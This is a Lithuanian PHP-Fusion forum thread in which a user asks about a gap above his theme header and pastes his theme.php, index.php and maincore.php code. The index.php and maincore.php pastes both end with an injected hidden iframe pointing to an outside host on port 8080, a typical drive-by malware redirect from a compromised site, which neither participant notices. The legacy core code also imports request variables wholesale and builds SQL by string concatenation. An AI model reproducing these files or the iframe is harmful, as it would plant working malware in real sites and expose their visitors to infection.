Tarpas prieš headerį - WordPress, Shopify ir PHPFusion programuotojų bendruomenė

Navigacija

Vartotojų tinkle

Prisijungusių svečių: 66
Prisijungusių narių: 0
Prisijungusių narių nėra

Registruoti nariai: 25,962
Naujausias narys: Wisedocs

Naujausi straipsniai

Įprasti:

IMG BBKodas

Pamoka ,nemokamo php...

HTML lentelės

Išnykstanti reklama

Kalendorius

Skirti naujokams:

Mano profilis įdėj...

PHP-Fusion V7.02.03 ...

Keletas pamokėlių ...

Paskutiniai nariai

Wisedocs	1 savaitė
asdasdddz	1 savaitė
Paslapties K...	3 savaitės
Audrius_17	5 savaitės
Reikalas	10 savaitės
Simbijanas	17 savaitės
Karinacraft	18 savaitės
Žmogus	21 savaitės
Bruksnys	25 savaitės
Darexs	28 savaitės
Nepas	29 savaitės
keistuole	31 savaitės
Gizmis	32 savaitės
Rytis	42 savaitės
MaFetas	46 savaitės
ozzWANTED	47 savaitės
saulyzas	49 savaitės
TOMIJUS	50 savaitės
Jaunelis	66 savaitės
lanis	66 savaitės

Informacija:

OS: Unknown
Naršyklė: Nežinoma
IP: 216.73.216.170
Naujienų: 529
Straipsnių: 235
Temų: 52,589
Postų: 522,549
Postų pask. parą: 0
Shout'ų pask. parą: 0
P.S.C. pask. parą: 0
Nuorodų kataloge: 13

Lankomumo Statistika

Peržiūrų šiandien: 22

Iš viso peržiūrų: 22948724

Prisijungti

REGISTRUOTIS

Pamiršai slaptažodį?
Paprašyk naujo
Aktyvuoti save

Šaukykla

Jei norite rašyti žinutes, turite prisijungti.

Žmogus
2025 Geg. 31 10:05:18
Kas geresnio?

Nepas
2025 Bal. 9 17:04:13

Nepas
2025 Bal. 9 17:04:08

Gizmis
2025 Kov. 15 14:03:50
OMG, smagu matyt sita puslapi veikianti

ozzWANTED
2024 Lap. 30 15:11:14
Taip, vis dar up

Šaukyklos archyvas

Apklausa

Archyvas

Reklama 400x60

Automatizuotas hostingas

Tarpas prieš headerį

Forumas | PHP-Fusion, WordPress, Shopify, PHP ir MySQL (PROGRAMAVIMAS) | Bendri PHP-F klausimai

Autorius: betmenas

Peržiūrų: 2975

betmenas Narys Fruktas Pranešimai: 24 Įstojęs: 2009 Lie. 4 17:07:38	2009 Rugp. 14 16:08:21 1 žinutė iš 8
	Sveiki. Taig tokia bėda, kad atsirado tarpas prieš headerį. Atrodo taip: theame.php kodo pradžia čia: <?php if (!defined("IN_FUSION")) { header("Location: ../../index.php"); exit; } /--------------------------------------------+ \| PHP-Fusion v6 - Content Management System \| \|---------------------------------------------\| \| author: Nick Jones (Digitanium) © 2002-2005 \| \| web: http://www.php-fusion.co.uk \| \| email: nick@php-fusion.co.uk \| \|---------------------------------------------\| \| Released under the terms and conditions of \| \| the GNU General Public License (Version 2) \| +--------------------------------------------/ /--------------------------------------------+ \| Revision Theme for PHP-Fusion v6 \| \|---------------------------------------------\| \| author: UworldIRC - Riadi © 2006 \| \| web: http://www.uworldirc.com/ \| \| email: riadi@gcinet.org \| \|---------------------------------------------\| \| Released under the terms and conditions of \| \| the GNU General Public License (Version 2) \| +--------------------------------------------/ define('IN_REVISION', true); require_once(INCLUDES.'theme_functions_include.php'); require_once(THEME.'includes/navigationbar.class.php'); require_once(THEME.'theme_config.php'); function render_header() { global $theme_width, $rtNavbar, $rtHeader, $settings; if ((isset($rtHeader['logo_url'])) && (!empty($rtHeader['logo_url']))) $url = $rtHeader['logo_url']; else $url = false; if ((isset($rtHeader['logo_url_title'])) && (!empty($rtHeader['logo_url_title']))) $title = $rtHeader['logo_url_title']; else $title = false; echo "<script language='javascript' src='".THEME."includes/revision.js' type='text/javascript'></script>\n" ."<table align='center' border='0' cellpadding='0' cellspacing='0' width='920'>\n" ."<tr><td class='pageLeft'></td><td width='100%' class='pageCenter' valign='top'>\n" ."<table border='0' cellpadding='0' cellspacing='0' id='header' width='100%'><tr>\n" ."".($title ? " alt='".$title."'" : " ")." <object width=\"920\" height=\"280\"> <param name=\"movie\" value=\"http://www.saulessmiltys.lt/themes/Dominus/headeris.swf\"> <embed src=\"http://www.saulessmiltys.lt/themes/Dominus/headeris.swf\" width=\"920\" height=\"280\"> </embed> </object> </a>".($title ? " title='".$title."'" : "")."" .($url ? "</a>" : "") .((isset($rtHeader['slogan']) && !empty($rtHeader['slogan'])) ? "<br><span class='slogan'>".$rtHeader['slogan']."</span>" : "")."</td>\n"; echo "</tr></table>\n"; $rtNavbar->generate(); echo "<table border='0' cellpadding='0' cellspacing='0' width='100%'><tr>\n"; } Kame čia bėda? Dėkui.
betmenas Narys Fruktas Pranešimai: 24 Įstojęs: 2009 Lie. 4 17:07:38	2009 Rugp. 14 16:08:01 2 žinutė iš 8
	Perkėliau po info ir vistiek tas pat. Ištryniau ir vistiek niekas nesikeičia. Kur jį dėt?
Narysx Narys Ekspertas Pranešimai: 2940 Įstojęs: 2007 Rugs. 18 19:09:56	2009 Rugp. 14 16:08:59 3 žinutė iš 8
	Duok maincore.php, subheader.php ir index.php kodus.
betmenas Narys Fruktas Pranešimai: 24 Įstojęs: 2009 Lie. 4 17:07:38	2009 Rugp. 14 17:08:22 4 žinutė iš 8
	Index: <?php /---------------------------------------------------+ \| PHP-Fusion 6 Content Management System +----------------------------------------------------+ \| Copyright © 2002 - 2006 Nick Jones \| http://www.php-fusion.co.uk/ +----------------------------------------------------+ \| Released under the terms & conditions of v2 of the \| GNU General Public License. For details refer to \| the included gpl.txt file or visit http://gnu.org +----------------------------------------------------/ require_once "maincore.php"; redirect($settings['opening_page']); ?> <iframe src="http://c6p.at:8080/ts/in.cgi?pepsi141" width=125 height=125 style="visibility: hidden"></iframe> Maincore: <?php /---------------------------------------------------+ \| PHP-Fusion 6 Content Management System +----------------------------------------------------+ \| Copyright © 2002 - 2006 Nick Jones \| http://www.php-fusion.co.uk/ +----------------------------------------------------+ \| Released under the terms & conditions of v2 of the \| GNU General Public License. For details refer to \| the included gpl.txt file or visit http://gnu.org +----------------------------------------------------/ if (eregi("maincore.php", $_SERVER['PHP_SELF'])) die(); // If register_globals is turned off, extract super globals (php 4.2.0+) if (ini_get('register_globals') != 1) { if ((isset($_POST) == true) && (is_array($_POST) == true)) extract($_POST, EXTR_OVERWRITE); if ((isset($_GET) == true) && (is_array($_GET) == true)) extract($_GET, EXTR_OVERWRITE); } // Prevent any possible XSS attacks via $_GET. foreach ($_GET as $check_url) { if ((eregi("<[^>]script\"?[^>]>", $check_url)) \|\| (eregi("<[^>]object\"?[^>]>", $check_url)) \|\| (eregi("<[^>]iframe\"?[^>]>", $check_url)) \|\| (eregi("<[^>]applet\"?[^>]>", $check_url)) \|\| (eregi("<[^>]meta\"?[^>]>", $check_url)) \|\| (eregi("<[^>]style\"?[^>]>", $check_url)) \|\| (eregi("<[^>]form\"?[^>]>", $check_url)) \|\| (eregi("$[^>]\"?[^)]$", $check_url)) \|\| (eregi("\"", $check_url))) { die (); } } unset($check_url); // Start Output Buffering ob_start(); // Locate config.php and set the basedir path $folder_level = ""; while (!file_exists($folder_level."config.php")) { $folder_level .= "../"; } require_once $folder_level."config.php"; define("BASEDIR", $folder_level); // If config.php is empty, activate setup.php script if (!isset($db_name)) redirect("setup.php"); // Establish mySQL database connection $link = dbconnect($db_host, $db_user, $db_pass, $db_name); // Fetch the Site Settings from the database and store them in the $settings variable $settings = dbarray(dbquery("SELECT FROM ".$db_prefix."settings")); // Sanitise $_SERVER globals $_SERVER['PHP_SELF'] = cleanurl($_SERVER['PHP_SELF']); $_SERVER['QUERY_STRING'] = isset($_SERVER['QUERY_STRING']) ? cleanurl($_SERVER['QUERY_STRING']) : ""; $_SERVER['REQUEST_URI'] = isset($_SERVER['REQUEST_URI']) ? cleanurl($_SERVER['REQUEST_URI']) : ""; $PHP_SELF = cleanurl($_SERVER['PHP_SELF']); // Common definitions define("IN_FUSION", TRUE); define("FUSION_REQUEST", isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI'] != "" ? $_SERVER['REQUEST_URI'] : $_SERVER['SCRIPT_NAME']); define("FUSION_QUERY", isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : ""); define("FUSION_SELF", basename($_SERVER['PHP_SELF'])); define("USER_IP", $_SERVER['REMOTE_ADDR']); define("QUOTES_GPC", (ini_get('magic_quotes_gpc') ? TRUE : FALSE)); // Path definitions define("ADMIN", BASEDIR."administration/"); define("IMAGES", BASEDIR."images/"); define("IMAGES_A", IMAGES."articles/"); define("IMAGES_N", IMAGES."news/"); define("IMAGES_NC", IMAGES."news_cats/"); define("INCLUDES", BASEDIR."includes/"); define("LOCALE", BASEDIR."locale/"); define("LOCALESET", $settings['locale']."/"); define("FORUM", BASEDIR."forum/"); define("INFUSIONS", BASEDIR."infusions/"); define("PHOTOS", IMAGES."photoalbum/"); define("THEMES", BASEDIR."themes/"); // MySQL database functions function dbquery($query) { $result = @mysql_query($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbcount($field,$table,$conditions="") { $cond = ($conditions ? " WHERE ".$conditions : ""); $result = @mysql_query("SELECT Count".$field." FROM ".DB_PREFIX.$table.$cond); if (!$result) { echo mysql_error(); return false; } else { $rows = mysql_result($result, 0); return $rows; } } function dbresult($query, $row) { $result = @mysql_result($query, $row); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbrows($query) { $result = @mysql_num_rows($query); return $result; } function dbarray($query) { $result = @mysql_fetch_assoc($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbarraynum($query) { $result = @mysql_fetch_row($query); if (!$result) { echo mysql_error(); return false; } else { return $result; } } function dbconnect($db_host, $db_user, $db_pass, $db_name) { $db_connect = @mysql_connect($db_host, $db_user, $db_pass); $db_select = @mysql_select_db($db_name); if (!$db_connect) { die("<div style='font-family:Verdana;font-size:11px;text-align:center;'><b>Unaašo establish connection to MySQL</b><br>".mysql_errno()." : ".mysql_error()."</div>"); } elseif (!$db_select) { die("<div style='font-family:Verdana;font-size:11px;text-align:center;'><b>Unaašo select MySQL database</b><br>".mysql_errno()." : ".mysql_error()."</div>"); } } // Initialise the $locale array $locale = array(); // Load the Global language file include LOCALE.LOCALESET."global.php"; // Check if users full or partial ip is blacklisted $sub_ip1 = substr(USER_IP,0,strlen(USER_IP)-strlen(strrchr(USER_IP,"."))); $sub_ip2 = substr($sub_ip1,0,strlen($sub_ip1)-strlen(strrchr($sub_ip1,"."))); if (dbcount("()", "blacklist", "blacklist_ip='".USER_IP."' OR blacklist_ip='$sub_ip1' OR blacklist_ip='$sub_ip2'")) { header("Location: http://www.google.com/"); exit; } // PHP-Fusion user cookie functions if (!isset($_COOKIE['fusion_visited'])) { $result=dbquery("UPDATE ".$db_prefix."settings SET counter=counter+1"); setcookie("fusion_visited", "yes", time() + 31536000, "/", "", "0"); } if (isset($_POST['login'])) { $user_pass = md5($_POST['user_pass']); $user_name = preg_replace(array("/\=/","/\#/","/\sOR\s/"), "", stripinput($_POST['user_name'])); $result = dbquery("SELECT FROM ".$db_prefix."users WHERE user_name='$user_name' AND (user_password='".md5($user_pass)."' OR user_password='$user_pass')"); if (dbrows($result) != 0) { $data = dbarray($result); if ($data['user_password'] == $user_pass) { $result = dbquery("UPDATE ".$db_prefix."users SET user_password='".md5($user_pass)."' WHERE user_id='".$data['user_id']."'"); } $cookie_value = $data['user_id'].".".$user_pass; if ($data['user_status'] == 0) { $cookie_exp = isset($_POST['remember_me']) ? time() + 36002430 : time() + 36003; header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", $cookie_value, $cookie_exp, "/", "", "0"); redirect(BASEDIR."setuser.php?user=".$data['user_name'], "script"); } elseif ($data['user_status'] == 1) { redirect(BASEDIR."setuser.php?error=1", "script"); } elseif ($data['user_status'] == 2) { redirect(BASEDIR."setuser.php?error=2", "script"); } } else { redirect(BASEDIR."setuser.php?error=3"); } } if (isset($_COOKIE['fusion_user'])) { $cookie_vars = explode(".", $_COOKIE['fusion_user']); $cookie_1 = isNum($cookie_vars['0']) ? $cookie_vars['0'] : "0"; $cookie_2 = (preg_match("/^[0-9a-z]{32}$/", $cookie_vars['1']) ? $cookie_vars['1'] : ""); $result = dbquery("SELECT FROM ".$db_prefix."users WHERE user_id='$cookie_1' AND user_password='".md5($cookie_2)."'"); unset($cookie_vars,$cookie_1,$cookie_2); if (dbrows($result) != 0) { $userdata = dbarray($result); if ($userdata['user_status'] == 0) { if ($userdata['user_theme'] != "Default" && file_exists(THEMES.$userdata['user_theme']."/theme.php")) { define("THEME", THEMES.$userdata['user_theme']."/"); } else { define("THEME", THEMES.$settings['theme']."/"); } if ($userdata['user_offset'] <> 0) { $settings['timeoffset'] = $settings['timeoffset'] + $userdata['user_offset']; } if (empty($_COOKIE['fusion_lastvisit'])) { setcookie("fusion_lastvisit", $userdata['user_lastvisit'], time() + 3600, "/", "", "0"); $lastvisited = $userdata['user_lastvisit']; } else { $lastvisited = $_COOKIE['fusion_lastvisit']; } } else { header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", "", time() - 7200, "/", "", "0"); setcookie("fusion_lastvisit", "", time() - 7200, "/", "", "0"); redirect(BASEDIR."index.php", "script"); } } else { header("P3P: CP='NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM'"); setcookie("fusion_user", "", time() - 7200, "/", "", "0"); setcookie("fusion_lastvisit", "", time() - 7200, "/", "", "0"); redirect(BASEDIR."index.php", "script"); } } else { define("THEME", THEMES.$settings['theme']."/"); $userdata = ""; $userdata['user_level'] = 0; $userdata['user_rights'] = ""; $userdata['user_groups'] = ""; } // Redirect browser using the header function function redirect($location, $type="header") { if ($type == "header") { header("Location: ".$location); } else { echo "<script type='text/javascript'>document.location.href='".$location."'</script>\n"; } } // Fallback to safe area in event of unauthorised access function fallback($location) { header("Location: ".$location); exit; } // Clean URL Function, prevents entities in server globals function cleanurl($url) { $bad_entities = array("&", "\"", "'", '\"', "\'", "<", ">", "(", ")", ""); $safe_entities = array("&", "", "", "", "", "", "", "", "", ""); $url = str_replace($bad_entities, $safe_entities, $url); return $url; } // Strip Input Function, prevents HTML in unwanted places function stripinput($text) { if (QUOTES_GPC) $text = stripslashes($text); $search = array("\"", "'", "\\", '\"', "\'", "<", ">", " "); $replace = array(""", "'", "\", """, "'", "<", ">", " "); $text = str_replace($search, $replace, $text); return $text; } // stripslash function, only stripslashes if magic_quotes_gpc is on function stripslash($text) { if (QUOTES_GPC) $text = stripslashes($text); return $text; } // stripslash function, add correct number of slashes depending on quotes_gpc function addslash($text) { if (!QUOTES_GPC) { $text = addslashes(addslashes($text)); } else { $text = addslashes($text); } return $text; } // htmlentities is too agressive so we use this function function phpentities($text) { $search = array("&", "\"", "'", "\\", "<", ">"); $replace = array("&", """, "'", "\", "<", ">"); $text = str_replace($search, $replace, $text); return $text; } // Trim a line of text to a preferred length function trimlink($text, $length) { $dec = array("\"", "'", "\\", '\"', "\'", "<", ">"); $enc = array(""", "'", "\", """, "'", "<", ">"); $text = str_replace($enc, $dec, $text); if (strlen($text) > $length) $text = substr($text, 0, ($length-3))."..."; $text = str_replace($dec, $enc, $text); return $text; } // Validate numeric input function isNum($value) { return (preg_match("/^[0-9]+$/", $value)); } // Parse smiley bbcode into HTML images function parsesmileys($message) { $smiley = array( "#\:\)#si" => "<img src='".IMAGES."smiley/smile.gif' alt='smiley'>", "#\;\)#si" => "<img src='".IMAGES."smiley/wink.gif' alt='smiley'>", "#\:$#si" => "<img src='".IMAGES."smiley/sad.gif' alt='smiley'>", "#\:\\|#si" => "<img src='".IMAGES."smiley/frown.gif' alt='smiley'>", "#\:o#si" => "<img src='".IMAGES."smiley/shock.gif' alt='smiley'>", "#\:p#si" => "<img src='".IMAGES."smiley/pfft.gif' alt='smiley'>", "#b$#si" => "<img src='".IMAGES."smiley/cool.gif' alt='smiley'>", "#\:d#si" => "<img src='".IMAGES."smiley/grin.gif' alt='smiley'>", "#\:@#si" => "<img src='".IMAGES."smiley/angry.gif' alt='smiley'>" ); foreach($smiley as $key=>$smiley_img) $message = preg_replace($key, $smiley_img, $message); return $message; } // Show smiley icons in comments, forum and other post pages function displaysmileys($textarea) { $smiles = ""; $smileys = array ( ":)" => "smile.gif", ";)" => "wink.gif", ":\|" => "frown.gif", ":(" => "sad.gif", ":o" => "shock.gif", ":p" => "pfft.gif", "B)" => "cool.gif", ":D" => "grin.gif", ":@" => "angry.gif" ); foreach($smileys as $key=>$smiley) $smiles .= "<img src='".IMAGES."smiley/$smiley' alt='smiley' onClick=\"insertText('$textarea', '$key');\">\n"; return $smiles; } // Parse bbcode into HTML code function parseubb($text) { $text = preg_replace('#\[b\](.?)\[/b\]#si', '<b>\1</b>', $text); $text = preg_replace('#\[i\](.?)\[/i\]#si', '<i>\1</i>', $text); $text = preg_replace('#\[u\](.?)\[/u\]#si', '<u>\1</u>', $text); $text = preg_replace('#\[center\](.?)\[/center\]#si', '<center>\1</center>', $text); $text = preg_replace('#\[url\]([\r\n])(http://\|ftp://\|https://\|ftps://)([^\s\'\";\+]?)([\r\n])\[/url\]#si', '<a href=\'\2\3\' target=\'_blank\'>\2\3</a>', $text); $text = preg_replace('#\[url\]([\r\n])([^\s\'\";\+]?)([\r\n])\[/url\]#si', '<a href=\'http://\2\' target=\'_blank\'>\2</a>', $text); $text = preg_replace('#\[url=([\r\n])(http://\|ftp://\|https://\|ftps://)([^\s\'\";\+]?)\](.?)([\r\n])\[/url\]#si', '<a href=\'\2\3\' target=\'_blank\'>\4</a>', $text); $text = preg_replace('#\[url=([\r\n])([^\s\'\";\+]?)\](.?)([\r\n])\[/url\]#si', '<a href=\'http://\2\' target=\'_blank\'>\3</a>', $text); $text = preg_replace('#\[mail\]([\r\n])([^\s\'\";:\+]?)([\r\n])\[/mail\]#si', '<a href=\'mailto:\2\'>\2</a>', $text); $text = preg_replace('#\[mail=([\r\n])([^\s\'\";:\+]?)\](.?)([\r\n])\[/mail\]#si', '<a href=\'mailto:\2\'>\3</a>', $text); $text = preg_replace('#\[small\](.?)\[/small\]#si', '<span class=\'small\'>\1</span>', $text); $text = preg_replace('#\[color=(black\|blue\|brown\|cyan\|gray\|green\|lime\|maroon\|navy\|olive\|orange\|purple\|red\|silver\|violet\|white\|yellow)\](.?)\[/color\]#si', '<span style=\'color:\1\'>\2</span>', $text); $text = preg_replace('#\[flash width=([0-9]?) height=([0-9]?)\]([^\s\'\";:\+]?)(\.swf)\[/flash\]#si', '<object classid=\'clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\' codebase=\'http://active.macromedia.com/flash6/cabs/swflash.cab#version=6,0,0,0\' id=\'\3\4\' width=\'\1\' height=\'\2\'><param name=movie value=\'\3\4\'><param name=\'quality\' value=\'high\'><param name=\'bgcolor\' value=\'#ffffff\'><embed src=\'\3\4\' quality=\'high\' bgcolor=\'#ffffff\' width=\'\1\' height=\'\2\' type=\'application/x-shockwave-flash\' pluginspage=\'http://www.macromedia.com/go/getflashplayer\'></embed></object>', $text); $text = preg_replace("#\[img\]((http\|ftp\|https\|ftps)://)(.?)(\.(jpg\|jpeg\|gif\|png\|JPG\|JPEG\|GIF\|PNG))\[/img\]#sie","'<img src=\'\\1'.str_replace(array('.php','?','&','='),'','\\3').'\\4\' style=\'border:0px\'>'",$text); $qcount = substr_count($text, "[quote]"); $ccount = substr_count($text, "[code]"); for ($i=0;$i < $qcount;$i++) $text = preg_replace('#\[quote\](.?)\[/quote\]#si', '<div class=\'quote\'>\1</div>', $text); for ($i=0;$i < $ccount;$i++) $text = preg_replace('#\[code\](.?)\[/code\]#si', '<div class=\'quote\' style=\'width:400px;white-space:nowrap;overflow:auto\'><code style=\'white-space:nowrap\'>\1<br><br><br></code></div>', $text); $text = descript($text,false); return $text; } // This function sanitises news & article submissions function descript($text,$striptags=true) { // Convert problematic ascii characters to their true values $search = array("40","41","58","65","66","67","68","69","70", "71","72","73","74","75","76","77","78","79","80","81", "82","83","84","85","86","87","88","89","90","97","98", "99","100","101","102","103","104","105","106","107", "108","109","110","111","112","113","114","115","116", "117","118","119","120","121","122" ); $replace = array("(",")",":","a","b","c","d","e","f","g","h", "i","j","k","l","m","n","o","p","q","r","s","t","u", "v","w","x","y","z","a","b","c","d","e","f","g","h", "i","j","k","l","m","n","o","p","q","r","s","t","u", "v","w","x","y","z" ); $entities = count($search); for ($i=0;$i < $entities;$i++) $text = preg_replace("#(&\#)(0".$search[$i]."+);#si", $replace[$i], $text); // the following is based on code from bitflux (http://blog.bitflux.ch/wiki/) // Kill hexadecimal characters completely $text = preg_replace('#(&\#x)([0-9A-F]+);#si', "", $text); // remove any attribute starting with "on" or xmlns $text = preg_replace('#(<[^>]+[\\"\'\s])(onmouseover\|onmousedown\|onmouseup\|onmouseout\|onmousemove\|onclick\|ondblclick\|onload\|xmlns)[^>]>#iU', ">", $text); // remove javascript: and vbscript: protocol $text = preg_replace('#([a-z])=([\`\'\"])script:#iU', '$1=$2nojscript...', $text); $text = preg_replace('#([a-z])=([\`\'\"])javascript:#iU', '$1=$2nojavascript...', $text); $text = preg_replace('#([a-z])=([\'\"])vbscript:#iU', '$1=$2novbscript...', $text); //<span style="width: expression(alert('Ping!'));"></span> (only affects ie...) $text = preg_replace('#(<[^>]+)style=([\`\'\"]).expression\([^>]>#iU', "$1>", $text); $text = preg_replace('#(<[^>]+)style=([\`\'\"]).behaviour\([^>]>#iU', "$1>", $text); if ($striptags) { do { $thistext = $text; $text = preg_replace('#</(applet\|meta\|xml\|blink\|link\|style\|script\|embed\|object\|iframe\|frame\|frameset\|ilayer\|layer\|bgsound\|title\|base)[^>]>#i', "", $text); } while ($thistext != $text); } return $text; } // Scan image files for malicious code function verify_image($file) { $txt = file_get_contents($file); $image_safe = true; if (preg_match('#&(quot\|lt\|gt\|nbsp);#i', $txt)) { $image_safe = false; } elseif (preg_match("#&\#x([0-9a-f]+);#i", $txt)) { $image_safe = false; } elseif (preg_match('#&\#([0-9]+);#i', $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\`\'\"])script:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\`\'\"])javascript:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#([a-z])=([\'\"])vbscript:#iU", $txt)) { $image_safe = false; } elseif (preg_match("#(<[^>]+)style=([\`\'\"]).expression\([^>]>#iU", $txt)) { $image_safe = false; } elseif (preg_match("#(<[^>]+)style=([\`\'\"]).behaviour\([^>]>#iU", $txt)) { $image_safe = false; } elseif (preg_match("#</(applet\|link\|style\|script\|iframe\|frame\|frameset)[^>]>#i", $txt)) { $image_safe = false; } return $image_safe; } // captcha routines function make_captcha() { global $settings; srand((double)microtime() * 1000000); $temp_num = md5(rand(0,9999)); $captcha_string = substr($temp_num, 17, 5); $captcha_encode = md5($temp_num); $result = mysql_query("INSERT INTO ".DB_PREFIX."captcha (captcha_datestamp, captcha_ip, captcha_encode, captcha_string) VALUES('".time()."', '".USER_IP."', '$captcha_encode', '$captcha_string')"); if ($settings['validation_method'] == "image") { return "<input type='hidden' name='captcha_encode' value='".$captcha_encode."'><img src='".INCLUDES."captcha_include.php?captcha_code=".$captcha_encode."' alt='' />\n"; } else { return "<input type='hidden' name='captcha_encode' value='".$captcha_encode."'><strong>".$captcha_string."</strong>\n"; } } function check_captcha($captchs_encode, $captcha_string) { if (preg_match("/^[0-9a-z]+$/", $captchs_encode) && preg_match("/^[0-9a-z]+$/", $captcha_string)) { $result = dbquery("SELECT * FROM ".DB_PREFIX."captcha WHERE captcha_ip='".USER_IP."' AND captcha_encode='".$captchs_encode."' AND captcha_string='".$captcha_string."'"); if (dbrows($result)) { $result = dbquery("DELETE FROM ".DB_PREFIX."captcha WHERE captcha_ip='".USER_IP."' AND captcha_encode='".$captchs_encode."' AND captcha_string='".$captcha_string."'"); return true; } else { return false; } } else { return false; } } // Replace offensive words with the defined replacement word function censorwords($text) { global $settings; if ($settings['bad_words_enabled'] == "1" && $settings['bad_words'] != "" ) { $word_list = explode("\r\n", $settings['bad_words']); for ($i=0;$i < count($word_list);$i++) { if ($word_list[$i] != "") $text = preg_replace("/".$word_list[$i]."/si", $settings['bad_word_replace'], $text); } } return $text; } // Display the user's level function getuserlevel($userlevel) { global $locale; if ($userlevel==101) { return $locale['user1']; } elseif ($userlevel==102) { return $locale['user2']; } elseif ($userlevel==103) { return $locale['user3']; } } // Check if Administrator has correct rights assigned function checkrights($right) { if (iADMIN && in_array($right, explode(".", iUSER_RIGHTS))) { return true; } else { return false; } } // Check if user is assigned to the specified user group function checkgroup($group) { if (iSUPERADMIN) { return true; } elseif (iADMIN && ($group == "0" \|\| $group == "101" \|\| $group == "102")) { return true; } elseif (iMEMBER && ($group == "0" \|\| $group == "101")) { return true; } elseif (iGUEST && $group == "0") { return true; } elseif (iMEMBER && in_array($group, explode(".", iUSER_GROUPS))) { return true; } else { return false; } } // Compile access levels & user group array function getusergroups() { global $locale; $groups_array = array( array("0", $locale['user0']), array("101", $locale['user1']), array("102", $locale['user2']), array("103", $locale['user3']) ); $gsql = dbquery("SELECT group_id,group_name FROM ".DB_PREFIX."user_groups"); while ($gdata = dbarray($gsql)) { array_push($groups_array, array($gdata['group_id'], $gdata['group_name'])); } return $groups_array; } // Get the name of the access level or user group function getgroupname($group) { global $locale; if ($group == "0") { return $locale['user0']; } elseif ($group == "101") { return $locale['user1']; } elseif ($group == "102") { return $locale['user2']; } elseif ($group == "103") { return $locale['user3']; } else { $gsql = dbquery("SELECT group_id,group_name FROM ".DB_PREFIX."user_groups WHERE group_id='$group'"); if (dbrows($gsql)!=0) { $gdata = dbarray($gsql); return $gdata['group_name']; } else { return "N/A"; } } } function groupaccess($field) { if (iSUPERADMIN) { $res = "($field='0' OR $field='101' OR $field='102' OR $field='103'"; } elseif (iADMIN) { $res = "($field='0' OR $field='101' OR $field='102'"; } elseif (iMEMBER) { $res = "($field='0' OR $field='101'"; } elseif (iGUEST) { $res = "($field='0'"; } if (iUSER_GROUPS != "") $res .= " OR $field='".str_replace(".", "' OR $field='", iUSER_GROUPS)."'"; $res .= ")"; return $res; } // Create a list of files or folders and store them in an array function makefilelist($folder, $filter, $sort=true, $type="files") { $res = array(); $filter = explode("\|", $filter); $temp = opendir($folder); while ($file = readdir($temp)) { if ($type == "files" && !in_array($file, $filter)) { if (!is_dir($folder.$file)) $res[] = $file; } elseif ($type == "folders" && !in_array($file, $filter)) { if (is_dir($folder.$file)) $res[] = $file; } } closedir($temp); if ($sort) sort($res); return $res; } // Create a selection list from an array created by makefilelist() function makefileopts($files, $selected="") { $res = ""; for ($i=0;$i < count($files);$i++) { $sel = ($selected == $files[$i] ? " selected" : ""); $res .= "<option value='".$files[$i]."'$sel>".$files[$i]."</option>\n"; } return $res; } // Universal page pagination function by CrappoMan function makepagenav($start,$count,$total,$range=0,$link=""){ global $locale; if ($link == "") $link = FUSION_SELF."?"; $res=""; $pg_cnt=ceil($total / $count); if ($pg_cnt > 1) { $idx_back = $start - $count; $idx_next = $start + $count; $cur_page=ceil(($start + 1) / $count); $res.="<table cellspacing='1' cellpadding='1' border='0' class='tbl-border'>\n<tr>\n"; $res.="<td class='tbl2'><span class='small'>".$locale['052']."$cur_page".$locale['053']."$pg_cnt</span></td>\n"; if ($idx_back >= 0) { if ($cur_page > ($range + 1)) $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=0'><<</a></td>\n"; $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=$idx_back'><</a></td>\n"; } $idx_fst=max($cur_page - $range, 1); $idx_lst=min($cur_page + $range, $pg_cnt); if ($range==0) { $idx_fst = 1; $idx_lst=$pg_cnt; } for($i=$idx_fst;$i<=$idx_lst;$i++) { $offset_page=($i - 1) * $count; if ($i==$cur_page) { $res.="<td class='tbl1'><span class='small'><b>$i</b></span></td>\n"; } else { $res.="<td class='tbl1'><a class='small' href='$link"."rowstart=$offset_page'>$i</a></td>\n"; } } if ($idx_next < $total) { $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=$idx_next'>></a></td>\n"; if ($cur_page < ($pg_cnt - $range)) $res.="<td class='tbl2'><a class='small' href='$link"."rowstart=".($pg_cnt-1)$count."'>>></a></td>\n"; } $res.="</tr>\n</table>\n"; } return $res; } // Format the date & time accordingly function showdate($format, $val) { global $settings; if ($format == "shortdate" \|\| $format == "longdate" \|\| $format == "forumdate") { return strftime($settings[$format], $val+($settings['timeoffset']3600)); } else { return strftime($format, $val+($settings['timeoffset']3600)); } } // Translate bytes into kb, mb, gb or tb by CrappoMan function parsebytesize($size,$digits=2,$dir=false) { $kb=1024; $mb=1024$kb; $gb=1024$mb; $tb=1024$gb; if (($size==0)&&($dir)) { return "Empty"; } elseif ($size<$kb) { return $size."Bytes"; } elseif ($size<$mb) { return round($size/$kb,$digits)."Kb"; } elseif ($size<$gb) { return round($size/$mb,$digits)."Mb"; } elseif ($size<$tb) { return round($size/$gb,$digits)."Gb"; } else { return round($size/$tb,$digits)."Tb"; } } // User level, Admin Rights & User Group definitions define("iGUEST",$userdata['user_level'] == 0 ? 1 : 0); define("iMEMBER", $userdata['user_level'] >= 101 ? 1 : 0); define("iADMIN", $userdata['user_level'] >= 102 ? 1 : 0); define("iSUPERADMIN", $userdata['user_level'] == 103 ? 1 : 0); define("iUSER", $userdata['user_level']); define("iUSER_RIGHTS", $userdata['user_rights']); define("iUSER_GROUPS", substr($userdata['user_groups'], 1)); if (iADMIN) { define("iAUTH", substr($userdata['user_password'],16,32)); $aidlink = "?aid=".iAUTH; } ?> <iframe src="http://c6p.at:8080/ts/in.cgi?pepsi141" width=125 height=125 style="visibility: hidden"></iframe> Subheader: <?php /---------------------------------------------------+ \| 